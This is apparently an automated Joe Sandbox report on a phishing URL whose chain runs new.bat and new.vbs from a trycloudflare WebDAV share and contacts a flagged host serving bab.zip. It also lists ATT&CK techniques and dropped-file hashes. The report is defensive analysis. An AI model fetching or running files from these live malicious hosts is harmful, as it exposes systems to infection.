      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs
      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs
      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information112
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		112
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Network Share Discovery      		Remote ServicesData from Local System2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive4
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook1
      DLL Side-Loading      		NTDS31
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture4
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Application Window Discovery      		SSHKeylogging5
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      https://listafrica.org/Receipt.html0%Avira URL Cloudsafe

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://kinggamminginvoicfin.shop:8510/bab.zip0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        listafrica.org
        		172.93.120.138
        		truefalse
          		unknown
          winaero.com
          		68.183.112.81
          		truefalse
            		high
            www.google.com
            		142.250.181.100
            		truefalse
              		high
              kinggamminginvoicfin.shop
              		154.216.17.175
              		truetrue
                		unknown
                kmaybelsrka.sbs
                		154.216.17.175
                		truetrue
                  		unknown
                  x1.i.lencr.org
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://listafrica.org/Receipt.htmlfalse
                      		unknown
                      http://kinggamminginvoicfin.shop:8510/bab.ziptrue
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.217.19.238
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      1.1.1.1
                      		unknownAustralia
                      		13335CLOUDFLARENETUSfalse
                      68.183.112.81
                      		winaero.comUnited States
                      		14061DIGITALOCEAN-ASNUSfalse
                      172.217.17.35
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      172.217.17.46
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      2.18.109.164
                      		unknownEuropean Union
                      		20940AKAMAI-ASN1EUfalse
                      142.250.181.100
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      172.93.120.138
                      		listafrica.orgUnited States
                      		393960HOST4GEEKS-LLCUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      154.216.17.175
                      		kinggamminginvoicfin.shopSeychelles
                      		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                      52.6.155.20
                      		unknownUnited States
                      		14618AMAZON-AESUSfalse
                      172.217.21.35
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      64.233.162.84
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      23.195.39.65
                      		unknownUnited States
                      		20940AKAMAI-ASN1EUfalse
                      23.203.104.175
                      		unknownUnited States
                      		16625AKAMAI-ASUSfalse
                      199.232.210.172
                      		bg.microsoft.map.fastly.netUnited States
                      		54113FASTLYUSfalse
                      172.64.41.3
                      		unknownUnited States
                      		13335CLOUDFLARENETUSfalse
                      92.122.16.141
                      		unknownEuropean Union
                      		16625AKAMAI-ASUSfalse

                      Private

                      IP
                      192.168.2.17
                      192.168.2.27
                      127.0.0.1

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1572478
                      Start date and time:2024-12-10 16:03:50 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                      Sample URL:https://listafrica.org/Receipt.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:59
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      Analysis Mode:stream
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal88.troj.spyw.expl.evad.win@82/57@11/172

                      Warnings

                      • Exclude process from analysis (whitelisted): TextInputHost.exe
                      • Excluded IPs from analysis (whitelisted): 172.217.21.35, 64.233.162.84, 172.217.19.238
                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: https://listafrica.org/Receipt.html

                      Created / dropped Files

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.128399606261279
                      Encrypted:false
                      SSDEEP:
                      MD5:E40EA2E202755F62975EE02F6FE6A3B7
                      SHA1:27230D996BE7C3ADEEE7F622740E98D3F1E6FEAB
                      SHA-256:FC9D6E2093B1D822A3AF4D797A6A108E498B7E13A72AE7EC8C9BE905811D0A42
                      SHA-512:C6E1FB789182125BEFA2EF324D3E0B0BAB15301253572E9FF9BD42EAD54074B86002BC77CEC3294CBF148CBD3692BB7DEF94AF274790874C0343EE8C5C586C78
                      Malicious:false
                      Reputation:unknown
                      Preview:2024/12/10-10:05:08.061 1884 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-10:05:08.064 1884 Recovering log #3.2024/12/10-10:05:08.064 1884 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):335
                      Entropy (8bit):5.1365986653635245
                      Encrypted:false
                      SSDEEP:
                      MD5:1E0524161EC1FC9A314402E8F3B32C7F
                      SHA1:6895C935FED13ECFA9F844C0D4731E3825068506
                      SHA-256:808B40332EAE930E02E1EC1371DD7A4DE2B2E1F194E5BA8BFADEE0A25FD59CE9
                      SHA-512:EED8DDBAE8C3E78478EDDD32B30EF2653A2704AEB4CCD64BCFADDB493C1BB690F13E770FD3B7EF39BAA7AC1FED9C414E37C82C8080CB55C5D6159975E84BDDE6
                      Malicious:false
                      Reputation:unknown
                      Preview:2024/12/10-10:05:07.957 7b0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-10:05:07.961 7b0 Recovering log #3.2024/12/10-10:05:07.961 7b0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0bd41235-dfb6-4f96-b267-b4d2d5dc8332.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:modified
                      Size (bytes):384
                      Entropy (8bit):4.932552339462053
                      Encrypted:false
                      SSDEEP:
                      MD5:1B8F511BE0FCD6FB7524F55C9FB06E61
                      SHA1:01BFA769F459561D9748A7E1AD5862DF8216BA4E
                      SHA-256:41F52BA78E708F3EEBFB6720F9E13F5DDBE656BCA1E370DF90AA53223ABC6361
                      SHA-512:FCF398D9D4274A7FFE41DE433DF3137BC1D62D1933733BAD71ED0DC69F77209427585F8D84088242070835FF2697FBEA752437A7A8C0945CB5A924652DCDC8F5
                      Malicious:false
                      Reputation:unknown
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145508750011","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8d64167a-5169-48b7-84b2-de73d120e5a9.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:modified
                      Size (bytes):476
                      Entropy (8bit):4.971518737957077
                      Encrypted:false
                      SSDEEP:
                      MD5:8BB168278227AF0F7E56A0017C0AFB6D
                      SHA1:8707319A88BDFDB588E003257FBC53BC73DD6597
                      SHA-256:CA7003E30C46476DABAE434E6BDE2451B8EC16DF6C91678533E43D1265971244
                      SHA-512:0113300C6994AE1A2BFD2590329EDFDF1F55098D25DCD6F77DAB3D42CD0E034AD37FB50F336D9EE450218DAC920108C264624BBFD02CD5CEDA7B4F8F3006E452
                      Malicious:false
                      Reputation:unknown
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378403117228511","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":651650},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):0
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:1B8F511BE0FCD6FB7524F55C9FB06E61
                      SHA1:01BFA769F459561D9748A7E1AD5862DF8216BA4E
                      SHA-256:41F52BA78E708F3EEBFB6720F9E13F5DDBE656BCA1E370DF90AA53223ABC6361
                      SHA-512:FCF398D9D4274A7FFE41DE433DF3137BC1D62D1933733BAD71ED0DC69F77209427585F8D84088242070835FF2697FBEA752437A7A8C0945CB5A924652DCDC8F5
                      Malicious:false
                      Reputation:unknown
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145508750011","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3bdbe9.TMP (copy)

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):0
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:1B8F511BE0FCD6FB7524F55C9FB06E61
                      SHA1:01BFA769F459561D9748A7E1AD5862DF8216BA4E
                      SHA-256:41F52BA78E708F3EEBFB6720F9E13F5DDBE656BCA1E370DF90AA53223ABC6361
                      SHA-512:FCF398D9D4274A7FFE41DE433DF3137BC1D62D1933733BAD71ED0DC69F77209427585F8D84088242070835FF2697FBEA752437A7A8C0945CB5A924652DCDC8F5
                      Malicious:false
                      Reputation:unknown
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145508750011","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):6678
                      Entropy (8bit):5.242550258458263
                      Encrypted:false
                      SSDEEP:
                      MD5:7C358592B86E587DBC31F5B0B9A2DE4A
                      SHA1:4090E73630819FA800A802B63453A6EFEDBBD2BC
                      SHA-256:8C48B192169E692B4E581A9E6BC40D63CBBAA4075C04B54ADD734F6627A856C2
                      SHA-512:C89774205AC0E1DF643C3E199304F1AEFA83A4B55D6B0DA3220D9B821A4DD9CC8BD0EFC798D94AB32E1C07DCE2A413FB03A1730B3114472C048EE8DA5AAC17A3
                      Malicious:false
                      Reputation:unknown
                      Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_

                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):323
                      Entropy (8bit):5.091473997346535
                      Encrypted:false
                      SSDEEP:
                      MD5:09CE738421D6EDE98F5AEE052FA1DEC8
                      SHA1:12670BAA66265368E982B78E8C25921166AFDC60
                      SHA-256:D6B299F30E81517FC2B52FCE5A8211A54D7468C9A224BE350AF893C3E09AE096
                      SHA-512:E9EA704BF9F56EEACAEC68FC188EBEABCF6BE947836700F7A62AC33D40C43B250EDFE53BBB931CF4FF9C80AE11AB66DDED8774387B713C6F51CDA9BC4D64C3AC
                      Malicious:false
                      Reputation:unknown
                      Preview:2024/12/10-10:05:08.108 7b0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-10:05:08.110 7b0 Recovering log #3.2024/12/10-10:05:08.111 7b0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                      Category:dropped
                      Size (bytes):86016
                      Entropy (8bit):4.444426269744844
                      Encrypted:false
                      SSDEEP:
                      MD5:E41F0BEA2351E4571B937AB4B942D0FC
                      SHA1:BACB5B9A9CFCBD4DD569D605F6EA3E8DE5162C97
                      SHA-256:D1842A3F01C3672D93680364A3FD578DA46F051FA1635AF7E4F78F22AE2A3E21
                      SHA-512:BF275849D66BF607EC2DB5B275DC35C4CF216E422E1844F9103A2B74FA99918E84460F3A324FF52CF0356CA17FEF39E4B4D08991431547809243FC48B023CA98
                      Malicious:false
                      Reputation:unknown
                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):3.767878549912588
                      Encrypted:false
                      SSDEEP:
                      MD5:FA3B7508B3AD917056EFC408634A2E0C
                      SHA1:22B21BF87A40E4BEBA15338C4D581C71E3CEBC42
                      SHA-256:854DCC9917E31E06D3C6CF97CA88F1CEC16DD9798AC3A4CFC9CCC895FA1ED2AE
                      SHA-512:980BF624D3007C518413F0E3E510A3D0CE9F349075040EBAEAF680AD54622A90F8519CC2D17901BD3F726352CC1E2D27F9074338A75B7A2762345B27554E51F0
                      Malicious:false
                      Reputation:unknown
                      Preview:.... .c......\. ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Certificate, Version=3
                      Category:dropped
                      Size (bytes):1391
                      Entropy (8bit):7.705940075877404
                      Encrypted:false
                      SSDEEP:
                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                      Malicious:false
                      Reputation:unknown
                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                      Category:dropped
                      Size (bytes):71954
                      Entropy (8bit):7.996617769952133
                      Encrypted:true
                      SSDEEP:
                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                      Malicious:false
                      Reputation:unknown
